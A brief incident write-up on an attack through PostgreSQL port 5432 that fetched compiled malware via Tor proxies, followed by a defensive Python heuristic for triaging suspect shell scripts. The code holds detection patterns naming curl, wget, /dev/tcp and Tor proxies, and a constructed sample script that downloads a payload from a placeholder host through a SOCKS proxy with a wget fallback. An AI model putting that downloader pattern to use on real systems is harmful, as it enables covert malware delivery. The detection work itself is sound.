
Cyber Attack Targets PostgreSQL Port 5432 Despite Firewall Protections
cyberattack, PostgreSQL, malware, Tor, iptables, script_obfuscation, binary_execution, network_security, incident_response
The author reports that their company experienced a cyber attack via port 5432 (PostgreSQL) on nearly all their servers, despite local networks being protected by iptables. A network team contact provided the malicious script, which downloads and executes malware using multiple methods, including connections through Tor proxies. The shell script employs obfuscated names, redirects outputs to /dev/null, checks its own execution, and attempts four different methods to download the final malware, which was found to be compiled binary code.
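
The behaviours listed above (silenced output, a self-execution check, Tor proxying, several download methods, obfuscated names) can be checked mechanically when triaging a suspect shell script. The following is an added example, not code from the incident or from the author; the regex patterns, the name-randomness rule, the threshold and the sample script are constructed assumptions.

```python
import re

# Heuristics for the traits the write-up lists. The patterns (tool names, Tor
# markers, name-randomness rule) are assumptions, not strings from the real script.
TRAITS = {
    "silenced_output": re.compile(r">\s*/dev/null"),
    "self_check": re.compile(r"\b(?:pgrep|pidof|flock)\b"),
    "tor_proxy": re.compile(r"--socks5|socks5h?://|torsocks|\.onion\b|:9050\b"),
}
DOWNLOADERS = {
    "curl": re.compile(r"\bcurl\b"),
    "wget": re.compile(r"\bwget\b"),
    "python_urllib": re.compile(r"\burllib\b|\burlopen\b"),
    "bash_dev_tcp": re.compile(r"/dev/tcp/"),
}
# Names defined as variables (name=) or functions (name() {).
NAME_DEF = re.compile(r"^\s*([A-Za-z_]\w*)\s*(?:=|\(\)\s*\{)", re.M)


def looks_random(name: str) -> bool:
    """Flag long identifiers with almost no vowels, a crude obfuscation signal."""
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return len(name) >= 6 and vowels / len(name) < 0.2


def triage(script: str) -> dict:
    """Return which of the described behaviours a shell script exhibits."""
    traits = [name for name, rx in TRAITS.items() if rx.search(script)]
    downloaders = sorted(n for n, rx in DOWNLOADERS.items() if rx.search(script))
    odd_names = sorted({n for n in NAME_DEF.findall(script) if looks_random(n)})
    if odd_names:
        traits.append("obfuscated_names")
    if len(downloaders) >= 2:  # several fetch tools = fallback download chain
        traits.append("download_fallbacks")
    return {"traits": sorted(traits), "downloaders": downloaders,
            "odd_names": odd_names, "suspicious": len(traits) >= 3}


# Constructed sample for illustration; placeholder host, not the incident script.
SAMPLE = r'''#!/bin/sh
zqxkvw() { pgrep -f "$0" >/dev/null 2>&1 && exit 0; }
hjkqrt="http://placeholder.invalid/f"
curl -s --socks5-hostname 127.0.0.1:9050 "$hjkqrt" -o /tmp/f >/dev/null 2>&1 ||
wget -q "$hjkqrt" -O /tmp/f >/dev/null 2>&1
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

A hit is a reason to pull the file for analysis, not a verdict: legitimate installers also silence output and call curl, which is why the example requires three traits together.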